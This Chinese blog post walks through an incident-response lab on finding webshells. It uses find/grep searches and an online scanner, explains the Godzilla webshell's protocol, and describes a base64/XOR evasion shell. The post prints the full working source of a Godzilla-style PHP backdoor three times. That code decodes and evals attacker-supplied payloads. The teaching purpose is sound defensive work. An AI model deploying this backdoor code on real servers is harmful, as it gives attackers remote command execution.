【玄机】第一章 应急响应-webshell查杀

最新推荐文章于 2024-08-08 23:14:40 发布
最新推荐文章于 2024-08-08 23:14:40 发布
阅读量825 收藏 25
点赞数 18
文章标签: 网络安全 web安全 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67997381/article/details/140575425
版权

题目:

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

方法一:命令查找

注意到/var/www/html目录下。

使用命令查找含有eval的php文件。

find ./ -name "*.php" |xargs grep "eval("

在这里插入图片描述

获取文件,查看内容。

得到flag为flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

在这里插入图片描述

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
                eval($payload);
        echo encode(@run($data),$key);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

方法二:使用在线webshell查杀工具

把/var/www/html文件夹压缩为zip压缩包,然后使用在线webshell查杀工具扫描。

在线webshell查杀

在这里插入图片描述

扫描后可以锁定目标!后续和方法一相同。

2.黑客使用的什么工具的shell github地址的md5 flag{md5}

首先先来看题目1中获取到的php文件内容。

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
                eval($payload);
        echo encode(@run($data),$key);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

经典的哥斯拉PHP马的特征:

  • session_start() 创建或者重启一个会话
  • @set_time_limit(0) 设置程序最长运行时间 永远
  • @error_reporting(0) 关闭错误报告
  • $key=xxxxxxxxx 加解密的盐值

哥斯拉php马的利用逻辑:

第一次通信时,服务端通过POST方式传递一个名叫pass的参数给木马,给pass参数赋的值是加密后的一组用”|”隔开的方法,也就是接下来要使用的攻击荷载。荷载在解密后被存入SESSION,供之后使用。

从第二次通信开始,pass传入的是远控命令,通过攻击荷载中的run()方法执行远控命令。然后对回显进行加密后传输给哥斯拉的服务端。

哥斯拉

md5加密:

flag{39392de3218c333f794befef07ac9257}

在这里插入图片描述

3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

方法一:手工翻阅并排查

在/var/www/html/include/Db文件下,对比ls和ls -a命令的区别:

在这里插入图片描述

发现了隐藏文件,.Mysqli.php。查看内容:

在这里插入图片描述

分析:

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
                eval($payload);
        echo encode(@run($data),$key);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

依旧是典型的哥斯拉马的特征。

路径:/var/www/html/include/Db/.Mysqli.php

MD5加密。flag{aebac0e58cd6c5fad1695ee4d1ac1919}

在这里插入图片描述

方法二:使用在线webshell查杀工具

在这里插入图片描述

依旧是题目1扫描的结果,可以看到明显标出来了/include/Db/.Mysqli.php,后续和方法一相同。

4.黑客免杀马完整路径 md5 flag{md5}

方法一:手工翻阅并排查

php免杀马通常字符串异或加密、base家族加密、rot13加密 字符串拼接等方式实现。

这里尝试最常见的base64编码,同样也是通过find去匹配关键字查询:

find ./ -name "*.php" | xargs grep "base64_decode"

在这里插入图片描述

查看php文件内容:

在这里插入图片描述

该免杀马首先使用base64对于接收到的func参数进行加密,以绕过黑名单检查,再使用key对加密的内容进行异或加密,然后通过$a.$s.$_GET[“func2”]拼接的方式来动态调用,绕过静态检验。

地址:/var/www/html/wap/top.php

flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}

方法二:使用在线webshell查杀工具

在这里插入图片描述

依旧是题目1扫描的结果,可以看到明显标出来了/wap/top.php,后续和方法一相同。

参考链接:

https://godyu.com/12918.html

https://blog.csdn.net/m0_63138919/article/details/138822190

青青很OK
关注
  • 18
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
容器网页终端(websocket-webshell
09-23
这些文件将协同工作,提供一个完整的WebSocket-WebShell解决方案,让用户能够通过浏览器轻松地对Docker容器进行管理。 总结来说,WebSocket-WebShell是一个利用WebSocket、Docker和HTML5等技术的创新工具,它允许...
luci-app-webshell_1-1_all.ipk
08-17
我也不知道怎么搞的,上一个webshell 会在网页上产生一个错误,是xrh.js使用上出现的错吴。我记得自己测试通过的呢,这个是我修正后自己生成的。这个应该兼容大多数的平台,只有一个主页,一个lua。我也不知道怎么写...
玄机-第一章 应急响应-webshell查杀
lin__ying的博客
07-27 528
session_start():用于创建或重启一个会话,这是 PHP 木马中常见的功能,用于存储攻击载荷或状态信息。eval()、assert():这些函数用于执行字符串作为 PHP 代码,是 PHP 木马中常见的执行恶意代码的方式。黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx。黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}cat gz.php #查看gz.php文件。
玄机-第一章 应急响应- Linux入侵排查
本散修的一些学习心得与笔记,道友请自便。
07-17 773
玄机-第一章 应急响应- Linux入侵排查 账号:root 密码:linuxruqin ssh root@IP 1.web目录存在木马,请找到木马的密码提交 2.服务器疑似存在不死马,请找到不死马的密码提交 3.不死马是通过哪个文件生成的,请提交文件名 4.黑客留下了木马文件,请找出黑客的服务器ip提交 5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
玄机靶场 - 第一章 应急响应-webshell查杀
最新发布
fishfishfishman的博客
08-08 449
可以联想到是Godzilla的缩写,但是用哥斯拉生成的webshell就只是普通的一句话,而这个webshell的代码格式有点像冰蝎。黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx。黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}查看文件内容,发现确实是使用了字符串拼接进行免杀,代码中没有直接暴露的高危函数。根据flag的格式要求,对免杀马文件的绝对路径进行md5加密,就能得到flag。
玄机平台应急响应webshell查杀
2301_76227305的博客
05-28 2300
以上就是常见的webshell排查手段,至于内存马的排查,那个属于高端的东西没有那么简单滴。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
玄机——第一章 应急响应-webshell查杀 wp(手把手保姆级教学)
焦虑的焦虑
06-07 4707
第一章 应急响应-webshell查杀 wp
第一章 应急响应-webshell查杀
2403_85472272的博客
07-01 293
第一章 应急响应-webshell查杀ssh 连接。
应急响应-webshell查杀
网络安全
07-08 965
玄机靶场地址:https://xj.edisec.net第一章 应急响应-webshell查杀1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx} 2.黑客使用的什么工具的shell github地址的md5 flag{md5} 3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xx...
[ 应急响应工具箱 ] Webshell查杀.rar
02-11
[ 应急响应工具箱 ] webshell查杀工具 包含如下文件 Sangfor_Webshell查杀工具 火绒剑独立版 v2021.06.01 d_safe_2.1.7.2_0107 sysdiag-full-5.0.73.1-2023.02.06.1 火绒剑独立版 v2021.06.01
应急响应-攻击入侵排查 教学PPT
11-17
总结来说,应急响应中的攻击入侵排查是一项复杂的工作,需要对WEB日志、系统日志有深入理解,并能识别各种攻击行为的特征。同时,掌握有效的检查工具是快速定位和解决安全问题的关键。通过不断学习和实践,网络安全...
webshell事件应急响应服务现场操作手册
04-07
webshell事件应急响应服务现场操作手册
玄机】-----应急响应
m0_63138919的博客
05-13 4120
玄机应急响应 题解 一起学习
应急响应01-linux入侵排查篇
Biu_Biu_Bi的博客
04-23 673
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。
网络安全应急响应----9、WebShell应急响应
七天
03-23 9300
文章目录一、Webshell简介1、常见webshell2、Webshell检测二、Webshell应急响应流程1、判断是否被植入webshell2、临时处置3、Webshell排查4、系统排查4.1、Windows系统排查4.2、Linux系统排查4.3、Web日志分析4.4、网络流量排查4.5、清除加固三、Webshell防御方法 一、Webshell简介 Webshell通常指以JSP、ASP、 PHP等网页脚本文件形式存在的一种服务器可执行文件,一般带有文件操作、命令执行功能,是一种网页后门。攻
应急响应-Webshell-技术操作指南
qq_50765147的博客
03-10 1917
应急响应时,首先应判断系统是否存在植入Webshell的可能。根据事件发生的时间进行排查,对攻击路径进行溯源分析。如果网站被植入暗链或出现单击链接跳转到其他网站(如博彩网站、色情网站等)的情况,应首先排查网站首页相关js,查看是否被植入了恶意跳转的js。如网站首页被篡改或其他被攻击的现象,则应根据网站程序信息,如程序目录、文件上传目录、war包部署目录,使用工具(如D盾)和搜索关键字(如eval、base64_decode、assert)方式,定位到Webshell文件并清除。
php批量getshell,任意文件上传引发的批量Getshell到服务器 - WileySec's Blog
weixin_36003864的博客
03-11 640
昨天闲来没事干,看了看娱乐网,看到有人发布了表白墙源码,本着这肯定有漏洞的心去测了一下,果然有漏洞存在任意文件上传直接Getshell,而后写了一个一键Getshell脚本批量。Feature漏洞位置在 Index 控制器下的 Index.php 中有个 upload 方法,存在任意文件上传代码审计部分就不详细说明了漏洞利用EXP编写import requestsimport urllib3imp...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值